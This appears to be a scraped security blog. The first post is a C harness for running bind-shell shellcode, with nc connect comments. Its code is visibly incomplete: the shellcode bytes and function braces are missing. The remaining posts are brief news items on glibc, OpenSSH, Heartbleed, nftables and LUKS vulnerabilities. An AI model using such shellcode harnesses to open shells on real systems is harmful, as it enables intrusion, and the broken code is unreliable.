Jul 16 06
#include <stdio.h>
#include <string.h>
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
unsigned char code[] = \
#define PORT "\x39\x39"
// Keep to two bytes
int main ()
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;

written by d45id \\ tags: , , , ,

Feb 16 18

tuxOh no! google engineers discovered a stack-based buffer overflow vulnerability in the getaddrinfo() library function in the DNS resolver, shipped with glibc versions since 2.9, which may allow a remote attacker to execute arbitrary code.

written by d45id \\ tags: , , , , , ,

Jan 16 14

sourcecodeToday OpenSSH project reported an bug in the client component of OpenSSH versions 5.4 up to 7.1.
The announced issue could allow an OpenSSH client to leak client memory to the connected SSH server including (private) key information. The vulnerability was discovered in the roaming feature of OpenSSH client which is default active.

This vulnerabilities affects the OpenSSH client on most operating systems like Linux, FreeBSD and Mac OSX. Continue reading »

written by d45id \\ tags: , , ,

Aug 14 23

The latest on the Linux kernel from Linus Torvalds, Andrew Morton (Google), Shuah Khan (Samsung), Andy Lutomirski (AMA Capital Management) and Greg Kroah-Hartman (The Linux Foundation (Moderator)). From LinuxCon + CloudOpen North America 2014 in Chicago, IL.

written by d45id \\ tags: , , , ,

Apr 14 07

heartbleed„A potentially very serious bug in OpenSSL 1.0.1 and 1.0.2 beta has been discovered that can leak just about any information, from keys to content. Better yet, it appears to have been introduced in 2011, and known since March 2012.“ Juha Saarien

„A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.“ security advisory

The attack may be repeated and it appears trivial to acquire the host’s private key. If you were running a vulnerable release, it is even suggested that you go as far as revoking all of your keys. Distributions using OpenSSL 0.9.8 are not vulnerable (Debian Squeeze vintage). Debian Wheezy, Ubuntu 12.04.4, Centos 6.5, Fedora 18, SuSE 12.2, OpenBSD 5.4, FreeBSD 8.4, and NetBSD 5.0.2 and all following releases are vulnerable. OpenSSL released 1.0.1g today addressing the vulnerability. Debian’s fix is in incoming and should hit mirrors soon, Fedora is having some trouble applying their patches, but a workaround patch to the package .spec (disabling heartbeats) is available for immediate application.

Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately
upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.

written by d45id \\ tags: , , , ,

Jan 14 20

tux_guardDie neue Kernelversion 3.13 hat nun einen neuen Paketfilter mit an Bord, Nftables.
Nftables entwickelt vom Netfilter-Projekt hat sich zum Ziel gesetzt die existierenden Frameworks wie {ip,ip6,arp,eb}tables – die u.a. auch von ihnen stammen – zu ersetzen …

Siehe hierzu auch:

Talk about nftables at Kernel Recipes 2013
Nftables quick howto

written by d45id \\ tags: , , ,

Dez 13 23

sourcecodeJakob Lell demonstriert ausführlich in seinem Artikel „Practical malleability attack against CBC-Encrypted LUKS partitions“ wie sich ein Angriff auf die Systemverschlüsselung unter Linux mit Linux Unified Key Setup (LUKS) im Cipher-Block-Chaining (CBC) Modus realisieren lässt.


written by d45id \\ tags: , , , ,

Nov 13 08

puffy-sshWie heute das OpenSSH-Projekt in einem Advisory bekannt gab existiert eine Memory Corruption-Problem, welches im Prinzip zu einer aus der Ferne ausnützbaren Sicherheitslücke führen kann.
Zwar lässt sich diese Lücke anscheinend nur nach erfolgreicher Anmeldung am System ausnutzen, dennoch empfiehlt es sich den angegebenen Workaround zu implementieren bzw. auf die entsprechend gepatchte Version upzugraden.

Noch ist nicht bekannt, dass Exploits die dieses Problem ausnützen können, existieren bzw. in Verwendung sind – da der Quellcode von OpenSSH offen ist, ist jedoch davon auszugehen, dass dies sehr bald der Fall sein wird. Continue reading »

written by d45id \\ tags: , , ,